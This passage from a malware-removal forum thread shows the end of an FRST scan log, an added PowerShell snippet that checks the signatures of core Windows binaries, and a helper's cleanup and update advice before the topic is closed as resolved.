2014-08-06 03:01 - 2014-03-04 02:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2014-08-06 03:01 - 2014-03-04 02:44 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\wincredprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-08-06 03:01 - 2014-03-04 02:43 - 00057344 _____ (Microsoft Corporation) C:\Windows\system32\cngprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\adprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\capiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\dpapiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:43 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll
2014-08-06 03:01 - 2014-03-04 02:20 - 03969984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-08-06 03:01 - 2014-03-04 02:20 - 03914176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-08-06 03:01 - 2014-03-04 02:17 - 00538112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\objsel.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cngprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\capiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpapiprovider.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dimsroam.dll
2014-08-06 03:01 - 2014-03-04 02:17 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincredprovider.dll
2014-08-06 03:01 - 2014-03-04 02:16 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2014-08-06 03:01 - 2013-08-01 19:12 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2014-08-06 03:01 - 2013-08-01 19:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2014-08-06 03:01 - 2013-08-01 18:48 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2014-08-06 03:01 - 2013-08-01 17:59 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2014-08-06 03:00 - 2014-06-06 21:02 - 17854464 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-06 03:00 - 2014-06-06 20:13 - 10890752 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-06 03:00 - 2014-06-06 19:59 - 02339328 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-06 03:00 - 2014-06-06 19:52 - 01348608 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-06 03:00 - 2014-06-06 19:51 - 01494016 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-06 03:00 - 2014-06-06 19:51 - 01392128 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-06 03:00 - 2014-06-06 19:50 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-08-06 03:00 - 2014-06-06 19:47 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-06 03:00 - 2014-06-06 19:45 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-08-06 03:00 - 2014-06-06 19:45 - 00599040 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-06 03:00 - 2014-06-06 19:45 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-06 03:00 - 2014-06-06 19:42 - 00282112 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-06 03:00 - 2014-06-06 19:39 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-08-06 03:00 - 2014-06-06 19:35 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-06 03:00 - 2014-06-06 17:05 - 12353024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-08-06 03:00 - 2014-06-06 16:25 - 09711616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-08-06 03:00 - 2014-06-06 16:12 - 01810432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-08-06 03:00 - 2014-06-06 16:04 - 01106432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-08-06 03:00 - 2014-06-06 16:03 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-08-06 03:00 - 2014-06-06 16:02 - 01129472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-08-06 03:00 - 2014-06-06 16:00 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2014-08-06 03:00 - 2014-06-06 15:58 - 00065024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-08-06 03:00 - 2014-06-06 15:57 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-08-06 03:00 - 2014-06-06 15:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-08-06 03:00 - 2014-06-06 15:54 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-08-06 03:00 - 2014-06-06 15:53 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
2014-08-06 03:00 - 2014-06-06 15:51 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2014-08-06 03:00 - 2014-06-06 15:47 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-08-06 03:00 - 2014-06-05 07:45 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-08-06 03:00 - 2014-06-05 07:26 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2014-08-06 03:00 - 2014-06-05 07:25 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2014-08-06 03:00 - 2014-04-11 19:22 - 00155072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2014-08-06 03:00 - 2014-04-11 19:22 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2014-08-06 03:00 - 2014-04-11 19:19 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2014-08-06 03:00 - 2014-04-11 19:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2014-08-06 03:00 - 2014-04-11 19:19 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2014-08-06 03:00 - 2014-04-11 19:19 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-08-06 03:00 - 2014-03-04 02:44 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-08-06 03:00 - 2014-03-04 02:43 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-08-06 03:00 - 2014-03-04 02:17 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-28 15:20 - 2014-08-28 14:19 - 00014924 _____ () C:\Users\mike\Desktop\FRST.txt
2014-08-28 15:20 - 2014-08-28 14:18 - 00000000 ____D () C:\FRST
2014-08-28 15:18 - 2014-08-28 15:18 - 00038660 _____ () C:\Users\mike\Desktop\HitmanPro_20140828_1518.log
2014-08-28 15:18 - 2014-08-28 15:10 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-28 15:11 - 2014-08-28 15:11 - 11193392 _____ (SurfRight B.V.) C:\Users\mike\Desktop\HitmanPro_x64.exe
2014-08-28 15:09 - 2014-08-28 15:08 - 10279800 _____ (SurfRight B.V.) C:\Users\mike\Desktop\HitmanPro.exe
2014-08-28 15:01 - 2009-07-13 21:45 - 00021088 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-28 15:01 - 2009-07-13 21:45 - 00021088 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-28 14:57 - 2014-08-28 14:57 - 00023791 _____ () C:\ComboFix.txt
2014-08-28 14:57 - 2014-08-28 14:35 - 00000000 ____D () C:\Qoobox
2014-08-28 14:57 - 2009-07-13 20:20 - 00000000 __RHD () C:\Users\Default
2014-08-28 14:56 - 2014-08-28 14:35 - 00000000 ____D () C:\Windows\erdnt
2014-08-28 14:54 - 2014-02-21 13:38 - 00000000 ____D () C:\Users\mike\AppData\Roaming\Spotify
2014-08-28 14:53 - 2013-04-12 14:32 - 00000112 _____ () C:\Windows\system32\config\netlogon.ftl
2014-08-28 14:53 - 2010-11-20 20:47 - 00253526 _____ () C:\Windows\PFRO.log
2014-08-28 14:53 - 2009-07-13 22:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-28 14:53 - 2009-07-13 21:51 - 00039462 _____ () C:\Windows\setupact.log
2014-08-28 14:53 - 2009-07-13 19:34 - 00000215 _____ () C:\Windows\system.ini
2014-08-28 14:52 - 2013-02-11 20:05 - 01480998 _____ () C:\Windows\WindowsUpdate.log
2014-08-28 14:52 - 2009-07-13 19:34 - 73138176 _____ () C:\Windows\system32\config\SOFTWARE.bak
2014-08-28 14:52 - 2009-07-13 19:34 - 28573696 _____ () C:\Windows\system32\config\COMPONENTS.bak
2014-08-28 14:52 - 2009-07-13 19:34 - 17825792 _____ () C:\Windows\system32\config\SYSTEM.bak
2014-08-28 14:52 - 2009-07-13 19:34 - 00786432 _____ () C:\Windows\system32\config\DEFAULT.bak
2014-08-28 14:52 - 2009-07-13 19:34 - 00262144 _____ () C:\Windows\system32\config\SECURITY.bak
2014-08-28 14:52 - 2009-07-13 19:34 - 00262144 _____ () C:\Windows\system32\config\SAM.bak
2014-08-28 14:48 - 2013-04-29 10:25 - 00000000 ____D () C:\Users\mike
2014-08-28 14:48 - 2013-04-12 14:36 - 00000000 ____D () C:\Users\networkadmin
2014-08-28 14:34 - 2014-08-28 14:33 - 05574834 ____R (Swearware) C:\Users\mike\Desktop\ComboFix.exe
2014-08-28 14:20 - 2014-08-28 14:19 - 00039005 _____ () C:\Users\mike\Desktop\Addition.txt
2014-08-28 14:18 - 2014-08-28 14:18 - 02103296 _____ (Farbar) C:\Users\mike\Desktop\FRST64.exe
2014-08-28 14:16 - 2014-08-28 14:16 - 00415232 _____ (Farbar) C:\Users\mike\Desktop\FSS.exe
2014-08-28 14:01 - 2014-08-28 13:58 - 00015759 _____ () C:\Users\mike\Desktop\attach.txt
2014-08-28 14:00 - 2014-08-28 13:58 - 00018738 _____ () C:\Users\mike\Desktop\dds.txt
2014-08-28 13:53 - 2014-01-09 12:48 - 00000636 _____ () C:\Windows\Tasks\TSOLnkUpdAlertTask.job
2014-08-28 13:51 - 2014-08-27 14:54 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Raptr
2014-08-28 13:51 - 2013-04-29 10:25 - 00000856 __RSH () C:\Users\mike\ntuser.pol
2014-08-28 13:46 - 2014-08-28 13:46 - 00688992 ____R (Swearware) C:\Users\mike\Desktop\dds.com
2014-08-28 12:33 - 2013-04-12 16:22 - 00000000 ____D () C:\Quote
2014-08-28 10:31 - 2014-08-28 10:31 - 00000000 ____D () C:\Users\mike\Desktop\ProcessExplorer
2014-08-28 10:29 - 2014-08-28 10:29 - 01187960 _____ () C:\Users\mike\Desktop\ProcessExplorer.zip
2014-08-28 07:06 - 2014-02-21 13:39 - 00000000 ____D () C:\Users\mike\AppData\Local\Spotify
2014-08-27 19:57 - 2013-08-20 12:08 - 00000000 ____D () C:\Users\mike\AppData\Local\ESET
2014-08-27 16:25 - 2014-08-27 16:25 - 00000000 ____D () C:\ProgramData\ATI
2014-08-27 16:23 - 2014-08-27 16:23 - 00000000 ____D () C:\Program Files\AMD
2014-08-27 15:09 - 2014-08-27 15:04 - 00000059 _____ () C:\Windows\LTDLGFILE14N.INI
2014-08-27 15:05 - 2014-08-27 15:05 - 00000026 _____ () C:\Windows\cur
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2014-08-27 14:55 - 2014-08-27 14:55 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\library_dir
2014-08-27 14:55 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\Raptr
2014-08-27 14:54 - 2014-08-27 14:54 - 00061828 _____ () C:\Windows\SysWOW64\CCCInstall_201408271454457815.log
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\ProgramData\AMD
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files\Common Files\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\ATI Technologies
2014-08-27 14:54 - 2014-08-27 14:54 - 00000000 ____D () C:\Program Files (x86)\AMD AVT
2014-08-27 14:54 - 2014-08-27 14:53 - 00000000 ____D () C:\ProgramData\Package Cache
2014-08-27 14:54 - 2014-08-27 14:53 - 00000000 ____D () C:\Program Files\ATI Technologies
2014-08-27 14:52 - 2014-08-27 14:52 - 00000000 ____D () C:\AMD
2014-08-27 14:36 - 2009-07-13 22:13 - 00786558 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-27 14:27 - 2014-08-27 14:51 - 269338400 _____ (AMD Inc.) C:\Users\networkadmin\Desktop\14-4-win7-win8-win8.1-64-dd-ccc-whql.exe
2014-08-27 13:33 - 2014-08-27 13:33 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Adobe
2014-08-27 13:29 - 2014-08-27 13:29 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Dell
2014-08-27 13:29 - 2014-08-27 13:21 - 211706272 _____ (Dell Inc.) C:\Users\networkadmin\Downloads\Video_Driver_HCTV5_WN32_8.922_A00.EXE
2014-08-27 13:20 - 2014-08-27 13:03 - 00000000 ____D () C:\temp
2014-08-27 13:07 - 2014-08-27 13:06 - 00003440 _____ () C:\Windows\System32\Tasks\PCDEventLauncherTask
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PCDr
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\ProgramData\PC-Doctor for Windows
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\My Dell
2014-08-27 13:06 - 2014-08-27 13:06 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-08-27 13:06 - 2013-02-11 20:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-08-27 13:03 - 2014-08-27 13:03 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\PCDr
2014-08-27 13:03 - 2013-08-22 10:52 - 00000000 ____D () C:\Users\networkadmin\AppData\Local\Deployment
2014-08-27 13:02 - 2014-08-27 13:02 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell
2014-08-27 13:00 - 2013-02-11 20:07 - 00699568 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-08-27 13:00 - 2013-02-11 20:07 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-08-27 12:07 - 2014-08-27 11:50 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-27 11:50 - 2014-08-27 11:50 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-08-27 11:31 - 2014-08-27 11:31 - 00000000 ____D () C:\Users\networkadmin\AppData\Roaming\Toshiba
2014-08-27 11:27 - 2014-08-27 11:27 - 00377984 _____ () C:\Windows\Minidump\082714-28298-01.dmp
2014-08-27 11:27 - 2013-06-24 16:07 - 539952258 _____ () C:\Windows\MEMORY.DMP
2014-08-27 11:27 - 2013-06-24 16:07 - 00000000 ____D () C:\Windows\Minidump
2014-08-27 11:07 - 2014-08-27 11:07 - 00000000 ____D () C:\Users\mike\AppData\Roaming\Toshiba
2014-08-27 11:06 - 2014-08-27 11:06 - 00447224 _____ () C:\Windows\Minidump\082714-26130-01.dmp
2014-08-27 11:03 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\LiveKernelReports
2014-08-21 09:37 - 2014-08-21 09:37 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Toshiba
2014-08-21 09:37 - 2014-08-21 09:36 - 00000000 ____D () C:\ProgramData\Toshiba
2014-08-21 09:36 - 2014-08-21 09:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Toshiba
2014-08-21 09:36 - 2013-02-11 20:23 - 00000000 ____D () C:\Windows\Downloaded Installations
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Jabra
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Toshiba
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Plantronics
2014-08-21 09:35 - 2014-08-21 09:35 - 00000000 ____D () C:\Program Files (x86)\Jabra
2014-08-21 09:34 - 2014-08-21 09:34 - 00087328 _____ () C:\Users\teleco3\AppData\Local\GDIPFONTCACHEV1.DAT
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Macromedia
2014-08-21 09:34 - 2014-08-21 09:34 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Intel Corporation
2014-08-21 09:34 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Adobe
2014-08-21 09:33 - 2014-08-21 09:33 - 00001411 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\ATI
2014-08-21 09:33 - 2014-08-21 09:33 - 00000000 ____D () C:\Users\teleco3\AppData\Local\Adobe
2014-08-21 09:33 - 2014-08-21 09:32 - 00001445 _____ () C:\Users\teleco3\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-08-21 09:33 - 2009-07-13 21:57 - 00001547 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-08-21 09:32 - 2014-08-21 09:32 - 00000020 ___SH () C:\Users\teleco3\ntuser.ini
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3\AppData\Roaming\Windows Small Business Server
2014-08-21 09:32 - 2014-08-21 09:32 - 00000000 ____D () C:\Users\teleco3
2014-08-20 12:14 - 2014-08-20 12:14 - 00007605 _____ () C:\Users\mike\AppData\Local\Resmon.ResmonCfg
2014-08-15 13:20 - 2013-04-12 16:21 - 00000000 ____D () C:\Users\Public\QpipeWrk
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\ProgramData\ESET
2014-08-14 09:12 - 2014-08-14 09:12 - 00000000 ____D () C:\Program Files\ESET
2014-08-13 06:56 - 2013-04-29 10:35 - 00011261 _____ () C:\Users\mike\Desktop\TIME SHEET Estimators.xlsx
2014-08-06 03:48 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\rescache
2014-08-06 03:11 - 2009-07-13 21:45 - 00347632 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-06 03:09 - 2010-11-21 00:17 - 00000000 ____D () C:\Program Files\Windows Journal
2014-08-06 03:09 - 2009-07-13 20:20 - 00000000 ____D () C:\Windows\PolicyDefinitions
2014-08-06 03:03 - 2013-04-12 15:03 - 00000000 ____D () C:\ProgramData\Microsoft Help

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-08-27 00:18

==================== End Of Log ============================
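The "Bamital & volsnap Check" in the FRST log above reports whether a handful of core Windows binaries are digitally signed, because file infectors such as Bamital patch exactly those files. The following PowerShell snippet is an added example, not FRST's own code and not part of the original post: it re-runs the same kind of check on the same file list with the built-in Get-AuthenticodeSignature cmdlet and reports anything that is not Valid. The function name Test-CoreFileSignatures and the list variable are assumptions of this example.

```powershell
# Added example (not FRST's code): re-check the signatures of the core binaries
# that FRST's "Bamital & volsnap Check" inspects. Paths are the ones listed in
# the log above; $env:SystemRoot is normally C:\Windows.
$coreFiles = @(
    "$env:SystemRoot\System32\winlogon.exe",
    "$env:SystemRoot\System32\wininit.exe",
    "$env:SystemRoot\SysWOW64\wininit.exe",
    "$env:SystemRoot\explorer.exe",
    "$env:SystemRoot\SysWOW64\explorer.exe",
    "$env:SystemRoot\System32\svchost.exe",
    "$env:SystemRoot\SysWOW64\svchost.exe",
    "$env:SystemRoot\System32\services.exe",
    "$env:SystemRoot\System32\User32.dll",
    "$env:SystemRoot\SysWOW64\User32.dll",
    "$env:SystemRoot\System32\userinit.exe",
    "$env:SystemRoot\SysWOW64\userinit.exe",
    "$env:SystemRoot\System32\rpcss.dll",
    "$env:SystemRoot\System32\Drivers\volsnap.sys"
)

function Test-CoreFileSignatures {
    # Returns one object per file with its signature status and signer.
    param([string[]]$Paths = $coreFiles)

    foreach ($path in $Paths) {
        if (-not (Test-Path -LiteralPath $path)) {
            # A missing core binary is itself worth noting (wrong path or deleted file).
            [pscustomobject]@{ Path = $path; Status = 'Missing'; Signer = '' }
            continue
        }
        $sig = Get-AuthenticodeSignature -LiteralPath $path
        $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
        [pscustomobject]@{
            Path   = $path
            Status = $sig.Status   # Valid, NotSigned, HashMismatch, UnknownError, ...
            Signer = $signer
        }
    }
}

# Full report, then only the entries that need a closer look.
Test-CoreFileSignatures | Format-Table -AutoSize
Test-CoreFileSignatures | Where-Object { $_.Status -ne 'Valid' }
```

One caveat before reading too much into the output: most Windows system files are signed through the OS security catalogs rather than with an embedded signature, and the PowerShell that ships with Windows 7 does not consult those catalogs, so a genuine OS file can come back as NotSigned there. HashMismatch is the result that points to a modified file; a NotSigned result on an older system should be re-checked with a catalog-aware tool (Sysinternals sigcheck, or Get-AuthenticodeSignature on a newer PowerShell) before it is treated as tampering.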



#10 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  • Gender:Male
  • Local time:10:23 AM

Posted 28 August 2014 - 05:31 PM

Great!

That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation.
Thank you!



Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restore points:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe to Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden, so don't add a double extension like Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run.
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this, malware exploits security holes in installed software (e.g. the browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Internet Explorer Version 9




Tips

I recommend reading and following the "16 simple and easy ways to keep your computer safe and secure on the Internet" (Link) by Lawrence Abrams.

#11 LynnBR

LynnBR
  • Topic Starter

  • Members
  • 104 posts
  • OFFLINE
  • Gender:Female
  • Local time:01:23 AM

Posted 28 August 2014 - 05:45 PM

Aharonov,

Many thanks for your assistance! All is working well. Nice trick with that rename and uninstall! Like the delfix program, doesn't rely on me to remember to delete old restore points, etc. Will update IE and check out the link.

Enjoy the beer!



#12 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  • Gender:Male
  • Local time:10:23 AM

Posted 28 August 2014 - 06:10 PM

Thank you very much for the beer and take care!

#13 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  • Gender:Male
  • Local time:10:23 AM

Posted 28 August 2014 - 06:10 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.



